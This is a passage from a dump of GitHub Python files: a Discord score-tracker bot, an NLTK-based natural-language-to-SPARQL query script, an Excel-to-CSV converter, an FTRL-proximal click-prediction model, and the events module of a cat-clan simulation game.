{}!\".format(self.tracker_target.mention))\r\n\r\n await self.bot.publish(ctx, \"score_tracker.scored\", score)\r\n\r\n @commands.command()\r\n @commands.check(is_tracker_user)\r\n async def fix(self, ctx, score: int):\r\n \"\"\"[score]: Used to fix the latest score entered\r\n Available during SCORE_TRACKER_CORRECTION_TIME minutes\r\n \"\"\"\r\n if len(self.history) <= 0:\r\n return await ctx.send(\"I have no score to fix!\")\r\n\r\n if datetime.utcnow() - self.history.loc[-1][\"date\"] > self.fix_time:\r\n return await ctx.send(\r\n \"It's too late to go back now, \"\r\n \"you will have to live with that mistake forever\"\r\n )\r\n\r\n if not self.is_in_range(score):\r\n return await ctx.send(\r\n \"It's not a valid score!\"\r\n \" Range is [{}, {}], you gave {}\".format(\r\n MIN_SCORE, MAX_SCORE, score\r\n )\r\n )\r\n\r\n if self.history.loc[-1].score == score:\r\n self.remove_last()\r\n\r\n await ctx.send(\r\n \"Previous score removed! Score was: {}\".format(score)\r\n )\r\n else:\r\n await ctx.send(\r\n \"Score does not match! Score was: {}\".format(\r\n self.history.loc[-1].score\r\n )\r\n )\r\n\r\n @score.error\r\n @fix.error\r\n async def error_handler(self, ctx, error):\r\n if isinstance(error, commands.MissingRequiredArgument):\r\n await ctx.send(\r\n \"The following argument is missing: {}\".format(error.param)\r\n )\r\n\r\n elif isinstance(error, commands.CheckFailure):\r\n await ctx.send(\"You cannot use that command!\")\r\n\r\n elif isinstance(error, commands.BadArgument):\r\n await ctx.send(\"The score need to be an integer\")\r\n\r\n else:\r\n print(\r\n \"Encountered unexpected error: {} {}\".format(error, type(error))\r\n )\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(ScoreTracker(bot))\r\n","repo_name":"T4g1/z14","sub_path":"modules/score_tracker.py","file_name":"score_tracker.py","file_ext":"py","file_size_in_byte":8094,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74385996968","text":"from nltk.tokenize import word_tokenize\nimport nltk\nfrom nltk.corpus import stopwords\nimport sparql\n\nsearch = raw_input(\"Search:\")\nprocessedWords = []\nwords = nltk.word_tokenize(search)\nsTwords = stopwords.words('english')\n\n#Removing stopwords\nfor word in words:\n if word not in sTwords:\n processedWords.append(word)\n\ntagged_words = nltk.pos_tag(processedWords)\nprint('Searching...')\n\n#Case where was born\nif (tagged_words[0][1] == 'WRB' and tagged_words[0][0] == 'Where' and tagged_words[1][1] == 'VBN'):\n term = ''\n i = 0\n for word in tagged_words:\n if (word[1] == 'NNP'):\n if (i == 0):\n term += word[0]\n else:\n term += ' ' + word[0]\n\n i += 1\n \n sparql.whereWasBorn(term)\n\n#Case who\nif (tagged_words[0][1] == 'WP'):\n name = ''\n i = 0\n for word in tagged_words:\n if (word[1] == 'NNP'):\n if (i == 0):\n name += word[0]\n else:\n name += ' ' + word[0]\n \n i += 1\n sparql.whoIs(name)\n\n#Case where\nif (tagged_words[0][1] == 'WRB'):\n place = ''\n i = 0\n for word in tagged_words:\n if (word[1] != 'WRB' and word[1] != '.'):\n if (i == 0):\n place += word[0]\n else:\n place += ' ' + word[0]\n\n i += 1\n \n sparql.whereIs(place)\n\n#Case what\nif (tagged_words[0][1] == 'WP' and tagged_words[0][0] == 'What'):\n term = ''\n i = 0\n for word in tagged_words:\n if (word[1] != 'WP' and word[1] != '.'):\n if (i == 0):\n term += word[0]\n else:\n term += ' ' + word[0]\n\n i += 1\n \n sparql.whatIs(term)\n\n# case how to cook\nif (tagged_words[0][1] == 'WRB' and tagged_words[0][0] == 'How'):\n term = ''\n i = 0\n for word in tagged_words:\n if (word[1] == 'NNP'):\n if (i == 0):\n term += word[0]\n else:\n term += ' ' + word[0]\n\n i += 1\n \n sparql.howToCook(term)\n\n","repo_name":"Cardoso222/NL2SPARQL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"7722725014","text":"# python gencsvs.py \n# run from CMD with anaconda prompt\nimport pandas as pd\n#\ndef g1():\n df = pd.read_excel('covmenu.xlsx', sheet_name='Hoja1')\n #\n df.to_csv(r'covmenu1.csv', index = False, header=True)\n print(\"g1\")\n\ndef g2():\n df = pd.read_excel('covmenu.xlsx', sheet_name='Hoja2')\n #\n df.to_csv(r'covmenu2.csv', index = False, header=True) \n print(\"g1\")\n# - - - - - - - - - - - - - - - - - - - - - \n#\nprint(\"ini\")\ng1()\n# \ng2() \n#\nprint(\"fin\")","repo_name":"DENRIV/PythonFlaskCovXXI","sub_path":"gencsvs.py","file_name":"gencsvs.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8752820223","text":"from csv import reader\r\nfrom math import exp, sqrt\r\nfrom random import random\r\n\r\nfrom xxhash import xxh64\r\n\r\n\r\ndef data(path, D):\r\n ''' GENERATOR: \r\n Apply hash-trick to the original csv row\r\n and for simplicity, we one-hot-encode everything\r\n\r\n INPUT:\r\n path: path to training or testing file\r\n D: the max index that we can hash to\r\n\r\n YIELDS:\r\n x: a list of hashed and one-hot-encoded 'indices'\r\n we only need the index since all values are either 0 or 1\r\n y: y = 1 if we have a click, else we have y = 0\r\n '''\r\n \r\n with open(path, 'r', encoding='utf-8') as f:\r\n csvreader = reader(f) # create a CSV reader\r\n header = next(csvreader)\r\n for row in csvreader: # iterate over the available rows\r\n row = dict(zip(header, row))\r\n \r\n # ts and bid_id are used only while updating train data\r\n for feat in ['bid_id', 'ts']:\r\n if feat in row:\r\n del row[feat]\r\n \r\n # process clicks\r\n y = 0.\r\n target='click'\r\n if target in row:\r\n if row[target] == '1':\r\n y = 1.\r\n del row[target]\r\n \r\n # build x\r\n x = []\r\n for key in row:\r\n value = row[key]\r\n # one-hot encode everything with hash trick\r\n index = xxh64(key + '_' + value).intdigest() % D\r\n x.append(index)\r\n \r\n yield x, y\r\n\r\n\r\nclass ftrl_proximal(object):\r\n ''' Main algorithm: Follow the regularized leader - proximal\r\n\r\n In short,\r\n this is an adaptive-learning-rate sparse logistic-regression with\r\n efficient L1-L2-regularization\r\n\r\n Reference:\r\n http://www.eecs.tufts.edu/~dsculley/papers/ad-click-prediction.pdf\r\n '''\r\n\r\n def __init__(self, alpha, beta, L1, L2, D, interaction):\r\n # parameters\r\n self.alpha = alpha\r\n self.beta = beta\r\n self.L1 = L1\r\n self.L2 = L2\r\n\r\n # feature related parameters\r\n self.D = D\r\n self.interaction = interaction\r\n\r\n # model\r\n # n: squared sum of past gradients\r\n # z: weights\r\n # w: lazy weights\r\n self.n = [0.] * D\r\n self.z = [random() for k in range(D)] #[0.] * D\r\n self.w = {}\r\n\r\n def _indices(self, x):\r\n ''' A helper generator that yields the indices in x\r\n\r\n The purpose of this generator is to make the following\r\n code a bit cleaner when doing feature interaction.\r\n '''\r\n\r\n # first yield index of the bias term\r\n yield 0\r\n\r\n # then yield the normal indices\r\n for index in x:\r\n yield index\r\n\r\n # now yield interactions (if applicable)\r\n if self.interaction:\r\n D = self.D\r\n L = len(x)\r\n\r\n x = sorted(x)\r\n for i in range(L):\r\n for j in range(i+1, L):\r\n # one-hot encode interactions with hash trick\r\n yield xxh64(str(x[i]) + '_' + str(x[j])).intdigest() % D\r\n\r\n def predict(self, x):\r\n ''' Get probability estimation on x\r\n\r\n INPUT:\r\n x: features\r\n\r\n OUTPUT:\r\n probability of p(y = 1 | x; w)\r\n '''\r\n\r\n # parameters\r\n alpha = self.alpha\r\n beta = self.beta\r\n L1 = self.L1\r\n L2 = self.L2\r\n\r\n # model\r\n n = self.n\r\n z = self.z\r\n w = {}\r\n\r\n # wTx is the inner product of w and x\r\n wTx = 0.\r\n for i in self._indices(x):\r\n sign = -1. if z[i] < 0 else 1. # get sign of z[i]\r\n\r\n # build w on the fly using z and n, hence the name - lazy weights\r\n # we are doing this at prediction instead of update time is because\r\n # this allows us for not storing the complete w\r\n if sign * z[i] <= L1:\r\n # w[i] vanishes due to L1 regularization\r\n w[i] = 0.\r\n else:\r\n # apply prediction time L1, L2 regularization to z and get w\r\n w[i] = round((sign * L1 - z[i]) / ((beta + sqrt(n[i])) / alpha + L2), 5)\r\n\r\n wTx += w[i]\r\n\r\n # cache the current w for update stage\r\n self.w = w\r\n\r\n # bounded sigmoid function, this is the probability estimation\r\n return 1. / (1. + exp(-max(min(wTx, 35.), -35.)))\r\n\r\n def update(self, x, p, y):\r\n ''' Update model using x, p, y\r\n\r\n INPUT:\r\n x: feature, a list of indices\r\n p: click probability prediction of our model\r\n y: answer\r\n\r\n MODIFIES:\r\n self.n: increase by squared gradient\r\n self.z: weights\r\n '''\r\n\r\n # parameter\r\n alpha = self.alpha\r\n\r\n # model\r\n n = self.n\r\n z = self.z\r\n w = self.w\r\n\r\n # gradient under logloss\r\n g = p - y\r\n\r\n # update z and n\r\n for i in self._indices(x):\r\n # if there were too many gradient steps along the feature\r\n # don't do step\r\n if (abs(z[i]) > 10e15)|(n[i] > 10e30):\r\n continue\r\n else:\r\n sigma = (sqrt(n[i] + g * g) - sqrt(n[i])) / alpha\r\n z[i] += g - sigma * w[i]\r\n n[i] += g * g\r\n \r\n def fit(self, path, epoch_num):\r\n ''' Fit model on a bunch of training data\r\n\r\n INPUT:\r\n path: path to training file\r\n epoch_num: number of training epochs\r\n\r\n MODIFIES:\r\n self.n: increase by squared gradient\r\n self.z: weights\r\n '''\r\n for e in range(epoch_num):\r\n for x, y in data(path, self.D): # data is a generator\r\n p = self.predict(x)\r\n self.update(x, p, y)\r\n \r\n def test(self, path):\r\n ''' Get target values and corresponding prediction for a bunch of test data\r\n\r\n INPUT:\r\n path: path to test file\r\n\r\n OUTPUT:\r\n ys: list of target values\r\n preds: list of prediction values\r\n '''\r\n preds = []\r\n ys = []\r\n for x, y in data(path, self.D):\r\n p = self.predict(x)\r\n preds += [p]\r\n ys += [y]\r\n return ys, preds\r\n \r\n def output_weigts(self):\r\n ''' Build the complete weight vector (for following saving)\r\n\r\n OUTPUT:\r\n w: weight vector for logistic regression\r\n '''\r\n alpha = self.alpha\r\n beta = self.beta\r\n L1 = self.L1\r\n L2 = self.L2\r\n \r\n # model\r\n n = self.n\r\n z = self.z\r\n w = {}\r\n for i in range(len(z)):\r\n sign = -1. if z[i] < 0 else 1. # get sign of z[i]\r\n \r\n # build the complete w\r\n if sign * z[i] <= L1:\r\n # w[i] vanishes due to L1 regularization\r\n w[i] = 0.\r\n else:\r\n # apply prediction time L1, L2 regularization to z and get w\r\n w[i] = round((sign * L1 - z[i]) / ((beta + sqrt(n[i])) / alpha + L2), 5)\r\n \r\n return w\r\n \r\n","repo_name":"mkhasykov/for_rtb_pricing_function","sub_path":"xxftrl.py","file_name":"xxftrl.py","file_ext":"py","file_size_in_byte":7372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18908662368","text":"from .cats import *\nfrom .buttons import *\nfrom .relation_events import * \n\nclass Events(object):\n all_events = {}\n\n def __init__(self, e_type=None, **cats):\n self.e_type = e_type\n self.ID = str(randint(0, 9)) + str(randint(0, 9)) + str(randint(\n 0, 9)) + str(randint(0, 9))\n if e_type is not None:\n self.all_events[self.ID] = self\n self.cats = cats\n self.at_war = False\n self.time_at_war = False\n self.enemy_clan = None\n self.living_cats = 0\n self.new_cat_invited = False\n self.ceremony_accessory = False\n game.switches['pregnancy'] = False\n game.switches['birth_cooldown'] = False\n if game.switches['birth_cooldown']:\n birth_range = randint(6, 9)\n\n def one_moon(self):\n if game.switches['timeskip']:\n game.switches['saved_clan'] = False\n self.living_cats = 0\n self.new_cat_invited = False\n game.patrolled.clear()\n for cat in cat_class.all_cats.copy().values():\n if not cat.dead and not cat.exiled:\n self._extracted_from_one_moon_7(cat)\n elif cat.exiled:\n cat.moons += 1\n if cat.moons == 6:\n cat.age = 'adolescent'\n elif cat.moons == 12:\n cat.age = 'adult'\n elif cat.moons == 100:\n cat.age = 'elder'\n if cat.moons > randint(100, 200):\n if choice([1, 2, 3, 4, 5]) == 1 and cat.dead == False:\n cat.dead = True\n game.cur_events_list.append(f'Rumors reach your clan that the exiled {str(cat.name)} has died recently')\n\n if cat.exiled and cat.status == 'leader' and cat.dead == False and randint(\n 1, 10) == 1:\n game.clan.leader_lives -= 1\n if game.clan.leader_lives <= 0:\n cat.dead = True\n game.cur_events_list.append(f'Rumors reach your clan that the exiled {str(cat.name)} has died recently')\n\n game.clan.leader_lives = 0\n elif cat.exiled and cat.status == 'leader' and cat.dead == False and randint(\n 1, 45) == 1:\n game.clan.leader_lives -= 10\n cat.dead = True\n game.cur_events_list.append(f'Rumors reach your clan that the exiled {str(cat.name)} has died recently')\n\n game.clan.leader_lives = 0\n else:\n cat.dead_for += 1\n\n # interaction here so every cat may have got a new name\n relation_events = Relation_Events()\n cat_list = list(cat_class.all_cats.copy().values())\n random.shuffle(cat_list)\n for cat in cat_list:\n if not cat.dead and not cat.exiled:\n relation_events.create_interaction(cat)\n relation_events.handle_relationships(cat)\n relation_events.check_if_having_kits(cat)\n #relation_events.have_kits(cat)\n cat_class.thoughts()\n self.check_clan_relations()\n game.clan.age += 1\n if game.settings.get(\n 'autosave') is True and game.clan.age % 5 == 0:\n cat_class.json_save_cats()\n game.clan.save_clan()\n game.clan.current_season = game.clan.seasons[game.clan.age % 12]\n game.event_scroll_ct = 0\n has_med = any(\n str(cat.status) in {\"medicine cat\", \"medicine cat apprentice\"}\n and not cat.dead and not cat.exiled\n for cat in cat_class.all_cats.values())\n\n if not has_med:\n game.cur_events_list.insert(\n 0, f\"{game.clan.name}Clan has no medicine cat!\")\n if game.clan.deputy == 0 or game.clan.deputy is None or game.clan.deputy.dead or game.clan.deputy.exiled:\n game.cur_events_list.insert(\n 0, f\"{game.clan.name}Clan has no deputy!\")\n if game.clan.leader.dead or game.clan.leader.exiled:\n game.cur_events_list.insert(\n 0, f\"{game.clan.name}Clan has no leader!\")\n if game.switches['birth_cooldown']:\n birth_range -= 1\n\n game.switches['timeskip'] = False\n\n # TODO Rename this here and in `one_moon`\n def _extracted_from_one_moon_7(self, cat):\n self.living_cats += 1\n cat.in_camp = 1\n self.check_age(cat)\n self.perform_ceremonies(cat)\n if self.new_cat_invited == False or self.living_cats < 10:\n self.invite_new_cats(cat)\n self.other_interactions(cat)\n self.gain_accessories(cat)\n self.gain_scars(cat)\n self.handle_deaths(cat)\n\n def check_clan_relations(self):\n if len(game.clan.all_clans) > 0 and randint(1, 5) == 1:\n war_notice = ''\n for other_clan in game.clan.all_clans:\n if int(other_clan.relations) <= 5:\n if randint(1, 5) == 1 and self.time_at_war > 2:\n self.at_war = False\n self.time_at_war = 0\n other_clan.relations = 10\n game.cur_events_list.append('The war against ' +\n str(other_clan.name) +\n 'Clan has ended')\n elif self.time_at_war == 0:\n game.cur_events_list.append('The war against ' +\n str(other_clan.name) +\n 'Clan has begun')\n self.time_at_war += 1\n else:\n self.enemy_clan = f'{str(other_clan.name)}Clan'\n possible_text = [\n f'War rages between {game.clan.name}Clan and {other_clan.name}Clan',\n f'{other_clan.name}Clan has taken some of {game.clan.name}'\n + \"Clan\\'s territory\",\n f'{game.clan.name}Clan has claimed some of {other_clan.name}'\n + \"Clan\\'s territory\",\n f'{other_clan.name}Clan attempted to break into your camp during the war',\n f'The war against {other_clan.name}Clan continues',\n f'{game.clan.name}Clan is starting to get tired of the war against {other_clan.name}Clan',\n f'{game.clan.name}Clan warriors plan new battle strategies for the war',\n f'{game.clan.name}Clan warriors reinforce the camp walls'\n ]\n if game.clan.medicine_cat is not None:\n possible_text.extend([\n 'The medicine cats worry about having enough herbs to treat their clan\\'s wounds'\n ])\n war_notice = choice(possible_text)\n self.time_at_war += 1\n break\n elif int(other_clan.relations) > 30:\n other_clan.relations = 10\n else:\n self.at_war = False\n if war_notice:\n game.cur_events_list.append(war_notice)\n\n def perform_ceremonies(self, cat):\n if (game.clan.leader.dead or game.clan.leader.exiled\n ) and game.clan.deputy is not None and not game.clan.deputy.dead:\n if game.clan.leader.exiled:\n game.cur_events_list.append(\n str(game.clan.leader.name) + ' was exiled')\n else:\n game.cur_events_list.append(\n str(game.clan.leader.name) +\n ' has lost their last life and has travelled to StarClan')\n game.clan.new_leader(game.clan.deputy)\n game.clan.leader_lives = 9\n game.cur_events_list.append(\n f'{str(game.clan.deputy.name)} has been promoted to the new leader of the clan'\n )\n self.ceremony_accessory = True\n self.gain_accessories(cat)\n game.clan.deputy = None\n if not cat.dead:\n cat.moons += 1\n if cat.status == 'deputy' and game.clan.deputy is None:\n game.clan.deputy = cat\n if cat.moons > cat_class.age_moons[cat.age][1]:\n if cat.age != 'elder':\n cat.age = cat_class.ages[cat_class.ages.index(cat.age) + 1]\n if cat.status == 'kitten' and cat.age == 'adolescent':\n cat.status_change('apprentice')\n game.cur_events_list.append(\n f'{str(cat.name)} has started their apprenticeship')\n self.ceremony_accessory = True\n self.gain_accessories(cat)\n cat.update_mentor()\n elif cat.status == 'apprentice' and cat.age == 'young adult':\n self._extracted_from_perform_ceremonies_19(\n cat, 'warrior', ' has earned their warrior name')\n self.ceremony_accessory = True\n self.gain_accessories(cat)\n elif cat.status == 'medicine cat apprentice' and cat.age == 'young adult':\n self._extracted_from_perform_ceremonies_19(\n cat, 'medicine cat',\n ' has earned their medicine cat name')\n self.ceremony_accessory = True\n self.gain_accessories(cat)\n game.clan.new_medicine_cat(cat)\n elif cat.status == 'deputy' and cat.age == 'elder' and len(\n cat.apprentice) < 1:\n cat.status_change('elder')\n game.clan.deputy = None\n game.cur_events_list.append(\n f'The deputy {str(cat.name)} has retired to the elder den'\n )\n elif cat.status == 'warrior' and cat.age == 'elder' and len(\n cat.apprentice) < 1:\n cat.status_change('elder')\n game.cur_events_list.append(\n f'{str(cat.name)} has retired to the elder den')\n if cat.status in [\n 'warrior', 'deputy'\n ] and cat.age == 'elder' and len(cat.apprentice) < 1:\n cat.status_change('elder')\n if str(cat.status) == 'deputy':\n game.clan.deputy = None\n game.cur_events_list.append(\n f'{str(cat.name)} has retired to the elder den')\n\n # TODO Rename this here and in `perform_ceremonies`\n def _extracted_from_perform_ceremonies_19(self, cat, arg1, arg2):\n cat.status_change(arg1)\n cat.update_mentor()\n game.cur_events_list.append(f'{str(cat.name)}{arg2}')\n\n def gain_accessories(self, cat):\n if cat.accessory is not None:\n return\n name = str(cat.name)\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown = int(len(cat_class.all_cats) / 3)\n while cat == other_cat or other_cat.dead or other_cat.exiled:\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown-=1\n if countdown <= 0:\n return\n other_name = str(other_cat.name)\n acc_text = []\n chance = randint(0, 50)\n if cat.age in ['kitten', 'adolescent']:\n chance = randint(0, 70)\n elif cat.age in ['young adult', 'adult', 'senior adult', 'elder']:\n chance = randint(0, 150)\n elif cat.trait in ['childish', 'lonesome', 'loving', 'playful', 'shameless', 'strange', 'troublesome']:\n chance = randint(0, 40)\n elif cat.status in ['medicine cat', 'medicine cat apprentice']:\n chance = randint(0, 30)\n if chance == 1:\n if cat.accessory is None:\n cat.accessory = choice([\n choice(plant_accessories),\n choice(wild_accessories)\n ])\n accessory = cat.accessory\n #if self.ceremony_accessory == True:\n # acc_text.extend([f'{other_name} gives {name} something to adorn their pelt as congratulations', f'{name} decides to pick something to adorn their pelt as celebration'])\n if cat.age != 'kitten':\n if cat.accessory in [\"FORGET ME NOTS\", \"BLUEBELLS\", \"POPPY\"]:\n if game.clan.current_season == 'Leaf-bare':\n acc_text.append(f'{name} found a mysterious flower growing in the {choice([\"snow\", \"ice\", \"frost\"])} and decided to wear it')\n else:\n acc_text.extend([f'{name} received a flower from {other_name} and decided to wear it on their pelt',\n f'{name} found a pretty flower and decided to wear it on their pelt', f'A clanmate gave {name} a flower and they decided to wear it'\n ])\n elif cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"] and cat.specialty != \"NOTAIL\" and cat.specialty2 != \"NOTAIL\":\n acc_text.append(f'{name} found a bunch of pretty feathers and decided to wear them')\n elif cat.accessory in [\"HERBS\", \"PETALS\", \"DRY_HERBS\"]:\n acc_text.append(f'{name} always seems to have something stuck in their fur')\n elif cat.accessory in plant_accessories and cat.status in ['medicine cat apprentice', 'medicine cat']:\n acc_text.extend([f'{name} has decided to always bring their {accessory.lower()} with them',\n f'{accessory.lower()} - an item so important to {name} that they always carry it around'.capitalize,\n f'{accessory.lower()} - so vital for {name} that they always have it on them'.capitalize\n ])\n else:\n acc_text.extend([f'{name} finds something interesting and decides to wear it on their pelt', f'A clanmate gives {name} a pretty accessory and they decide to wear it on their pelt',\n f'{name} finds something interesting while out on a walk and decides to wear it on their pelt', f'{name} finds {accessory.lower()} fascinating and decides to wear it on their pelt',\n f'A clanmate gives {name} something to adorn their pelt as a gift', f'{other_name} gives {name} a pretty accessory and they decide to wear it on their pelt'\n ])\n else:\n if cat.accessory in [\"FORGET ME NOTS\", \"BLUEBELLS\", \"POPPY\"]:\n acc_text.extend([f'{name} received a flower from {other_name} and decided to wear it on their pelt',\n f'{name} found a pretty flower and decided to wear it on their pelt', f'A clanmate gave {name} a flower and they decided to wear it'\n ])\n elif cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"] and cat.specialty != \"NOTAIL\" and cat.specialty2 != \"NOTAIL\":\n acc_text.append(f'{name} was playing with feathers earlier and decided to wear some of them')\n elif cat.accessory in [\"HERBS\", \"PETALS\", \"DRYHERBS\"]:\n acc_text.append(f'{name}\\'s parents try their best to groom them, but something is always stuck in their fur')\n else: \n acc_text.extend([f'{name} seems to have picked something up while playing out in the camp', f'{name} finds something interesting and decides to wear it on their pelt',\n f'A clanmate gives {name} a pretty accessory and they decide to wear it on their pelt', f'{other_name} gives {name} a pretty accessory and they decide to wear it on their pelt',\n f'{name} is so cute that they are given {accessory.lower()} as a gift', f'{name} starts to wear {accessory.lower()} on their pelt after their friend gave it to them',\n f'{name} was playing with {accessory.lower()} earlier and has decided to use it to adorn themselves'\n ])\n if acc_text:\n game.cur_events_list.append(choice(acc_text))\n if self.ceremony_accessory:\n self.ceremony_accessory = False \n\n def gain_scars(self, cat):\n if cat.specialty is not None and cat.specialty2 is not None or cat.age == 'kitten':\n return\n name = str(cat.name)\n other_cat = choice(list(cat_class.all_cats.values()))\n scar_chance = randint(0, 40)\n clancats = int(self.living_cats)\n countdown = int(len(cat_class.all_cats) / 3)\n while cat == other_cat or other_cat.dead or other_cat.exiled:\n other_cat = choice(list(cat_class.all_cats.values()))\n countdown-=1\n if countdown <= 0:\n return\n other_name = str(other_cat.name)\n scar_text = []\n clan_has_kits = any(\n str(cat.status) in \"kitten\"\n and not cat.dead and not cat.exiled\n for cat in cat_class.all_cats.values())\n if clancats > 45:\n scar_chance = scar_chance + 20\n elif clancats > 120:\n scar_chance = scar_chance * 2\n elif clancats > 300:\n scar_chance = scar_chance + 80\n else:\n scar_chance = scar_chance\n if cat.age in ['adolescent', 'young adult']:\n chance = scar_chance\n elif cat.age in ['adult', 'senior adult']:\n chance = scar_chance + 10\n elif cat.age in [\n 'apprentice', 'medicine cat apprentice'\n ] and cat.mentor.ID == other_cat.ID and other_cat.trait in [\n 'bloodthirsty', 'ambitious', 'vengeful', 'sadistic', 'cold',\n 'tough', 'clumsy', 'controlling', 'fierce', 'petty', 'strict'\n ]:\n chance = scar_chance - 15\n elif other_cat.status in ['leader', 'deputy'] and other_cat.trait in [\n 'bloodthirsty', 'ambitious', 'vengeful', 'sadistic', 'cold',\n 'tough', 'clumsy', 'controlling', 'fierce', 'petty', 'strict'\n ]:\n chance = scar_chance\n else:\n chance = scar_chance\n if chance == 1:\n if cat.specialty is None:\n cat.specialty = choice([\n choice(scars1),\n choice(scars2),\n choice(scars4),\n choice(scars5)\n ])\n if cat.specialty == 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]))\n elif cat.specialty == 'SNAKE':\n scar_text.append(f'{name} was bit by a snake but lived')\n elif cat.specialty == 'TOETRAP':\n scar_text.append(\n f'{name} got their paw stuck in a twoleg trap and earned a scar'\n )\n else:\n scar_text.extend([\n f'{name} earned a scar fighting a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]), f'{name} earned a scar defending the territory',\n f'{name} earned a scar protecting the kits',\n f'{name} is injured after falling into a river',\n f'{name} is injured by enemy warriors after accidentally wandering over the border',\n f'{name} is injured after messing with a twoleg object'\n ])\n elif cat.specialty2 is None:\n cat.specialty2 = choice([\n choice(scars1),\n choice(scars2),\n choice(scars4),\n choice(scars5)\n ])\n if cat.specialty2 == 'NOTAIL' and cat.specialty != 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]))\n elif cat.specialty2 == 'SNAKE' and cat.specialty != 'SNAKE':\n scar_text.append(f'{name} was bit by a snake but lived')\n elif cat.specialty2 == 'TOETRAP' and cat.specialty != 'TOETRAP':\n scar_text.append(\n f'{name} got their paw stuck in a twoleg trap and earned a scar'\n )\n else:\n if clan_has_kits == True:\n scar_text.extend([\n f'{name} earned a scar protecting the kits'])\n else:\n scar_text.extend([\n f'{name} earned a scar fighting a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]), f'{name} earned a scar defending the territory',\n f'{name} is injured after falling into a river',\n f'{name} is injured by enemy warriors after accidentally wandering over the border',\n f'{name} is injured after messing with a twoleg object',\n f'{name} is injured after a fight broke out with ' +\n other_name\n ])\n\n elif chance == 1 and cat.status in [\n 'apprentice', 'medicine cat apprentice'\n ] and cat.mentor.ID == other_cat.ID and other_cat.trait in [\n 'bloodthirsty', 'ambitious', 'vengeful', 'sadistic', 'cold',\n 'tough', 'clumsy', 'controlling', 'fierce', 'petty', 'strict'\n ]:\n if cat.specialty is None:\n cat.specialty = choice([choice(scars1), choice(scars2)])\n if cat.specialty == 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n scar_text.append(\n f'{name} recklessly lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]) + ' encouraged by their mentor')\n else:\n if clan_has_kits == True:\n scar_text.extend([\n f'{name} earned a scar protecting the kits'])\n else:\n scar_text.extend([\n f'{name} earned a scar recklessly fighting a ' +\n choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]) + ' encouraged by their mentor',\n f'{name} earned a scar for not defending the territory well enough',\n f'{name} is injured after being pushed into a river',\n f'{name} is punished by their mentor after accidentally wandering over the border',\n f'{name} is injured by their mentor after being caught messing with a twoleg object'\n f'{name} is injured by their mentor while practicing with their claws out',\n f'{name}\\'s mentor punished them for disobeying',\n f'{name} gained a scar while fighting their mentor',\n f'{name} is injured while practicing their battle moves with '\n + other_name,\n f'{name} is injured after a fight broke out with ' +\n other_name,\n f'{name} could not handle their mentor\\'s harsh training and got injured as a result',\n f'{name} could not handle their mentor\\'s harsh training and got injured as a result'\n ])\n elif cat.specialty2 is None:\n cat.specialty2 = choice([choice(scars1), choice(scars2)])\n if cat.specialty2 == 'NOTAIL' and cat.specialty != 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]) + ' encouraged by their mentor')\n else:\n if clan_has_kits == True:\n scar_text.extend([\n f'{name} earned a scar protecting the kits'])\n else:\n scar_text.extend([\n f'{name} earned a scar recklessly fighting a ' +\n choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger'\n ]) + ' encouraged by their mentor',\n f'{name} earned a scar for not defending the territory well enough',\n f'{name} is injured after being pushed into a river',\n f'{name} is punished by their mentor after accidentally wandering over the border',\n f'{name} is injured by their mentor after being caught messing with a twoleg object'\n f'{name} is injured by their mentor while practicing with their claws out',\n f'{name}\\'s mentor punished them for disobeying',\n f'{name} gained a scar while fighting their mentor',\n f'{name} is injured while practicing their batle moves with '\n + other_name,\n f'{name} is injured after a fight broke out with ' +\n other_name,\n f'{name} could not handle their mentor\\'s harsh training and got injured as a result'\n ])\n\n elif chance == 1 and cat.status in [\n 'warrior', 'deputy', 'medicine cat'\n ] and other_cat.status == 'leader':\n if cat.specialty is None:\n cat.specialty = choice([choice(scars1), choice(scars2)])\n if cat.specialty == 'NOTAIL':\n if cat.accessory in [\"RED FEATHERS\", \"BLUE FEATHERS\", \"JAY FEATHERS\"]:\n cat.accessory = None\n\n scar_text.append(f'{name} lost their tail to a ' + choice([\n 'rogue', 'dog', 'fox', 'otter', 'rat', 'hawk',\n 'enemy warrior', 'badger', 'tree', 'twoleg trap'\n ]) + ' while following 